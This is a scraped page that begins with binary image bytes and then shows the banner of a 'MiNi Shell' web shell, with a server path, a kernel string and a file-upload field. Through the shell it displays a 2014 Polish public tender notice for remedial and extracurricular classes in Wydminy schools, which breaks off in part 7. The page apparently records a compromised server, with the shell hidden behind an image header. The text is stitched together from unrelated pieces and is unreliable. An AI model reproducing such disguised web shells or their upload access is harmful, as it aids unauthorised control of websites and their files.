JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140225/37463-N-2014.html

<p class="kh_header"><b>Wydminy: Świadczenie usług poszerzenia oferty edukacyjnej o zajęcia wyrównawcze, rozwijające i specjalistyczne oraz wdrożenie nowych innowacyjnych form nauczania III.</b><br>
<b>Numer ogłoszenia: 37463 - 2014; data zamieszczenia: 25.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Obsługi Szkół w Wydminach , ul. Grunwaldzka 74, 11-510 Wydminy, woj. warmińsko-mazurskie, tel. 87 4210117, faks 87 4210117.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług poszerzenia oferty edukacyjnej o zajęcia wyrównawcze, rozwijające i specjalistyczne oraz wdrożenie nowych innowacyjnych form nauczania III..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług poszerzenia oferty edukacyjnej 
o zajęcia wyrównawcze, rozwijające uzdolnienia i zainteresowania, wdrożenie nowych innowacyjnych form nauczania z wykorzystaniem technik ICT.
Zakres zamówienia obejmuje: 15 części, łącznie w 6 szkołach (gimnazjum w Wydminach 
i Gawlikach Wielkich oraz szkoły podstawowe w Wydminach, Gawlikach Wielkich, Talkach 
i Zelkach). Zamawiający dopuszcza możliwość składania ofert częściowych na jedną 
lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia od 1-15.
 Zajęcia będą odbywać się w oparciu o podstawę programową - adekwatnie do potrzeb i możliwości poznawczych każdej grupy wiekowej. Na zajęciach wyrównawczych będzie powtarzany program lekcji, aby dzieci mogły przyswoić materiał, którego nie opanowały na lekcjach. Na zajęciach pogłębiających wiedzę z przedmiotów, będą realizowane zadania wykraczające poza program nauczania. Zajęcia będą odbywać w oparciu o istniejące przepisy prawa, w tym rozporządzenie ministra edukacji narodowej z dnia 30 kwietnia 2013r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach.
Wszystkie zajęcia realizowane będą z wykorzystaniem nowoczesnych narzędzi, takich jak: interaktywne programy komputerowe, zestawy audiowizualne (laptop, rzutnik, tablica interaktywna), a także przy użyciu tradycyjnych pomocy dydaktycznych w formie: ćwiczeń, książek, scenariuszy itp. Wszystkie zajęcia będą prowadzone przy użyciu technik aktywizujących takich jak: (m.in. burza mózgów, gra symulacyjna, drama, meta-plan, eksperyment, drzewo decyzyjne i inne). Zajęcia prowadzone będą metodami innowacyjnymi, aktywizującymi uczniów (np. metoda projektu, gry i zabawy dydaktyczne, warsztaty, eksperymenty) - z wykorzystaniem innowacyjnych technologii teleinformatycznych. 
Nie dopuszcza się prowadzenia zajęć w sposób typowo lekcyjny. Na każdych zajęciach będzie wyznaczony czas na wykorzystanie wiedzy w praktyce oraz korzystanie ze zdobytych informacji (np. testy, ćwiczenia terenowe, doświadczenia).
Wykonawcy zajęć wyrównawczych i uzdalniających zobowiązani będą do opracowania co najmniej 2 testów w roku szkolnym (początkowy i końcowy) i przeprowadzenia ich wśród uczestników zajęć we wszystkich grupach. Wyniki testów mają pokazać wzrost wiedzy i umiejętności, jakie zdobywać będą uczestnicy zajęć. Poza przeprowadzeniem zajęć w/w Wykonawcy będą zobowiązani do: współorganizacji, uczestnictwa i opieki w czasie wyjazdów edukacyjnych; wyjazdy edukacyjne odbywać się będą w dni powszednie lub w sobotę. Wykonawca zobowiązany będzie do opracowania i prowadzenia dokumentacji realizowanych zajęć, w tym: programu zajęć, miesięcznych planów pracy, miesięcznych sprawozdań, dziennika zajęć, kart obserwacji oraz innych dokumentów wynikających 
ze specyfiki prowadzonych zajęć. 
Przedmiot zamówienia w zakresie świadczenia usług w szkołach podstawowych obejmuje przeprowadzenie zajęć edukacyjnych uczniów w gminie Wydminy i opracowanie programów zajęć  przy zastosowaniu innowacyjnych metod nauczania. W ramach każdego rodzaju zajęć ma powstać wymierny efekt pracy uczniów w postaci: gazetek, prezentacji, zdjęć, filmów itp.
Rozwój kompetencji kluczowych w odniesieniu do wszystkich zajęć będzie przebiegał 
w oparciu o innowacyjne metody pracy (m.in. Metaplan, śnieżna kula, burza mózgów, symulacja, drzewo decyzyjne, metoda projektu z wykorzystaniem ICT). Zabronione jest prowadzenie zajęć w sposób typowo lekcyjny.
Zajęcia realizowane będą z wykorzystaniem nowoczesnych narzędzi, takich jak: interaktywne programy komputerowe, zestawy audiowizualne (laptop, rzutnik, tablica interaktywna)oraz przy użyciu tradycyjnych pomocy dydaktycznych w formie: gier, ćwiczeń, książek, scenariuszy itp.Zajęcia będą dopasowane do planu zajęć uczniów, mogą odbywać się w wybrane soboty. Będą odbywać się głównie w godzinach popołudniowych, po zrealizowaniu zajęć obowiązkowych. 
Pomiar: dziennik zajęć, listy, karty obserwacji. Zamawiający zapewnia salę, sprzęt i materiały warsztatowe do prowadzenia zajęć. Zamawiający nie pokrywa kosztów dojazdu do miejsca realizacji zajęć..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy pzp.-Wykonawca złoży również dokument potwierdzający spełnianie warunku udziału : -Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami według załącznika nr 5. Opis sposobu dokonania oceny spełniania warunku: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje dla danej części, na którą składa ofertę co najmniej jedną osobą spełniającą łącznie następujące warunki: -wykształcenie minimum wyższe o kierunku zgodnym z przedmiotem danej części zamówienia, (w oparciu o rozporządzenie Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli i obowiązujące przepisy) -kwalifikacje uprawniające do nauczania w szkole podstawowej lub wyższej kończącej się egzaminem oraz stopień nauczyciela minimum kontraktowego, -minimum 3 letni staż w nauczaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie przedłożonego wraz z ofertą oświadczenia o spełnianiu warunków z art. 22 ust. 1 ustawy pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.warmia.mazury/wydminy_gmina_wiejska<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Obsługi Szkół w Wydminach ul. Grunwaldzka 74, 11-510 Wydminy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 08:30, miejsce: Biuro Obsługi Szkół w Wydminach ul. Grunwaldzka 74, 11-510 Wydminy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Unii Europejskiej, w ramach programu Operacyjnego Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia wyrównawcze biologia - gimnazjum w Wydminach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie programu zajęć i przeprowadzenie zajęć wyrównawczych z biologii. Wykonawca zobowiązany będzie do przeprowadzenia 60 h zajęć dla 1 grupy uczniów z klas 
I-III, w okresie od stycznia 2014 r. do czerwca 2015 r. (po 30 h w 2013/2014 i 2014/2015). Zajęcia w jednym roku szkolnym realizowane będą w średnim wymiarze 1 h x 30 tyg. 
x 1 grupa. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty. 
W ramach zajęć z biologii uczniowie pogłębią wiedzę w ramach nauk przyrodniczo- technicznych, zajęcia będą realizowane w oparciu o środowisko audio-wizualne i w terenie. Zajęcia opierać się będą na przeprowadzaniu doświadczeń i badań, analizie zjawisk. Zajęcia uświadomią i wskażą uczniowi interdyscyplinarność nauk przyrodniczych. W ramach realizacji zajęć zostaną zrealizowane cele szczegółowe tj.: kształtowanie odpowiedzialności 
za przydzieloną pracę, rozbudzanie zainteresowań edukacją przyrodniczą, kształtowanie szacunku dla przyrody, zachęcanie młodzieży do aktywnych działań na rzecz lokalnego środowiska przyrodniczego, kształcenie umiejętności korzystania z różnorodnych źródeł wiedzy poprzez przeprowadzanie eksperymentów, obserwacji, doświadczeń, badań terenowych, udział w warsztatach edukacyjnych, poznanie miejsc ciekawych przyrodniczo 
w regionie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia wyrównawcze chemia - gimnazjum w Wydminach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie programu zajęć i przeprowadzenie zajęć wyrównawczych z chemii. Wykonawca zobowiązany będzie do przeprowadzenia 120 h zajęć dla 2 grup uczniów z klas 
I-III, w okresie od stycznia 2014 r. do czerwca 2015 r. (po 60 h w 2013/2014 i 2014/2015). Zajęcia w jednym roku szkolnym realizowane będą w średnim wymiarze 1 h x 30 tyg. 
x 2 grupy. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty. 
W ramach zajęć z chemii uczniowie pogłębią wiedzę w ramach nauk przyrodniczo- technicznych, zajęcia będą realizowane w oparciu o środowisko audio-wizualne i w terenie. Zajęcia opierać się będą na przeprowadzaniu doświadczeń i badań, analizie zjawisk. Zajęcia uświadomią i wskażą uczniowi interdyscyplinarność nauk przyrodniczych. Cele szczegółowe zajęć to: rozbudzanie i rozwijanie pasji badawczej, kształcenie umiejętności, bezpiecznego posługiwania się odczynnikami i sprzętem laboratoryjnym podczas samodzielnego wykonywania doświadczeń chemicznych, nabywanie umiejętności samodzielnego projektowania doświadczeń jako sposobu sprawdzania hipotez naukowych, rozwijanie umiejętności samodzielnej pracy z podręcznikami i książkami popularnonaukowymi, rozwijanie wyobraźni poprzez modelowanie, mobilizowanie do samodzielnej pracy, rozwijanie nawyku systematycznego uzupełniania wiedzy, integrowanie treści programu chemii z treściami innych nauk matematyczno-przyrodniczych, wyjaśnianie zjawisk, obserwowanych w życiu codziennym w oparciu o zdobywaną wiedzę, ilościowa interpretacja zjawisk chemicznych, organizowanie w sposób twórczy wolnego czasu np. poprzez ćwiczenia terenowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia wyrównawcze fizyka - gimnazjum w Wydminach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie programu zajęć i przeprowadzenie zajęć wyrównawczych z fizyki. Wykonawca zobowiązany będzie do przeprowadzenia 60 h zajęć dla 1 grupy uczniów z klas I-III, w okresie od stycznia 2014 r. do czerwca 2015 r. (po 30 h w 2013/2014 i 2014/2015). Zajęcia w jednym roku szkolnym realizowane będą w średnim wymiarze 1 h x 30 tyg. x 1 grupa. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty. 
W ramach zajęć z fizyki uczniowie pogłębią wiedzę w ramach nauk przyrodniczo- technicznych, zajęcia będą realizowane w oparciu o środowisko audio-wizualne i w terenie. Zajęcia opierać się będą na przeprowadzaniu doświadczeń i badań, analizie zjawisk. Zajęcia uświadomią i wskażą uczniowi interdyscyplinarność nauk przyrodniczych. Cele szczegółowe zajęć to: rozbudzanie i rozwijanie pasji badawczej, kształcenie umiejętności, nabywanie umiejętności samodzielnego projektowania doświadczeń jako sposobu sprawdzania hipotez naukowych, rozwijanie umiejętności samodzielnej pracy z podręcznikami i książkami popularnonaukowymi, rozwijanie wyobraźni poprzez modelowanie, mobilizowanie 
do samodzielnej pracy, rozwijanie nawyku systematycznego uzupełniania wiedzy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia z przedsiębiorczości - gimnazjum w Wydminach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie programu zajęć i przeprowadzenie zajęć z przedsiębiorczości. Wykonawca zobowiązany będzie do przeprowadzenia 90 h zajęć dla 3 grup uczniów z klas I-III, w okresie od stycznia 2014 r. do czerwca 2015 r. (po 45 h w 2013/2014 i 2014/2015). Zajęcia w jednym roku szkolnym realizowane będą w średnim wymiarze 1 h x 15 tyg. x 3 grupy. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty. 
Celem prowadzonych zajęć z przedsiębiorczości będzie ukształtowanie postaw przedsiębiorczości, kreatywności, asertywności i mobilności na rynku pracy, umiejętności pracy w zespole i skutecznego komunikowania się, poznanie podstaw małej przedsiębiorczości, poznanie mechanizmów funkcjonowania gospodarki rynkowej. W trakcie zajęć uczniowie przygotują mini plany symulujące zakładanie własnego biznesu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia wyrównawcze z biologii - gimnazjum w Gawlikach Wielkich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie programu zajęć i przeprowadzenie zajęć wyrównawczych z biologii. Wykonawca zobowiązany będzie do przeprowadzenia 120 h zajęć dla 2 grup uczniów z klas 
I-III, w okresie od stycznia 2014 r. do czerwca 2015 r. (po 60 h w 2013/2014 i 2014/2015). Zajęcia w jednym roku szkolnym realizowane będą w średnim wymiarze 1 h x 30 tyg. 
x 2 grupy. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty. 
W ramach zajęć z biologii uczniowie pogłębią wiedzę w ramach nauk przyrodniczo- technicznych, zajęcia będą realizowane w oparciu o środowisko audio-wizualne i w terenie. Zajęcia opierać się będą na przeprowadzaniu doświadczeń i badań, analizie zjawisk. Zajęcia uświadomią i wskażą uczniowi interdyscyplinarność nauk przyrodniczych. W ramach realizacji zajęć zostaną zrealizowane cele szczegółowe tj.: kształtowanie odpowiedzialności 
za przydzieloną pracę, rozbudzanie zainteresowań edukacją przyrodniczą, kształtowanie szacunku dla przyrody, zachęcanie młodzieży do aktywnych działań na rzecz lokalnego środowiska przyrodniczego, kształcenie umiejętności korzystania z różnorodnych źródeł wiedzy poprzez przeprowadzanie eksperymentów, obserwacji, doświadczeń, badań terenowych, udział w warsztatach edukacyjnych, poznanie miejsc ciekawych przyrodniczo 
w regionie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia wyrównawcze z przedsiębiorczości - gimnazjum w Gawlikach Wielkich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie programu zajęć i przeprowadzenie zajęć z przedsiębiorczości. Wykonawca zobowiązany będzie do przeprowadzenia 30 h zajęć dla 1 grupy uczniów z klas I-III, w okresie od stycznia 2014 r. do czerwca 2015 r. (po 15 h w 2013/2014 i 2014/2015). Zajęcia w jednym roku szkolnym realizowane będą w średnim wymiarze 1 h x 15 tyg. x 1 grupa. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty. 
Celem prowadzonych zajęć z przedsiębiorczości będzie ukształtowanie postaw przedsiębiorczości, kreatywności, asertywności i mobilności na rynku pracy, umiejętności pracy w zespole i skutecznego komunikowania się, poznanie podstaw małej przedsiębiorczości, poznanie mechanizmów funkcjonowania gospodarki rynkowej. W trakcie zajęć uczniowie przygotują mini plany symulujące zakładanie własnego biznesu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zajęcia pozalekcyjne dla uczniów zdolnych Młodzi odkrywcy dla klas IV-VI - Szkoła Podstawowa w Wydminach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia pozalekcyjne dla uczniów zdolnych Młodzi odkrywcy dla klas IV-VI
1 grupa * 1h * 60 tyg. = 60h (30h w roku szkolnym 2013/2014, 30h 2014/2015).
